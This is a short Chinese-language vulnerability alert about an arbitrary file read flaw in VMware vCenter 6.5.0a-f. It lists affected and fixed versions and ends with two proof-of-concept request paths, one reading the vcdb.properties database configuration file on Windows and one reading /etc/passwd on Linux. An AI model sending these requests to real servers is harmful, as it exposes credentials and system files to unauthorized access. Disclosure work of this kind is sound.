【漏洞预警】VMware vCenter任意文件读取漏洞
2020-10-15 本文已影响0人
migrate_
仅供交流与学习使用,请勿用于非法用途
- VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件。
影响范围
- 已知影响版本
VMware vCenter 6.5.0a-f
安全版本
VMware vCenter 6.5u1
vmware-vCenter
poc
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
#linux
/eam/vib?id=/etc/passwd
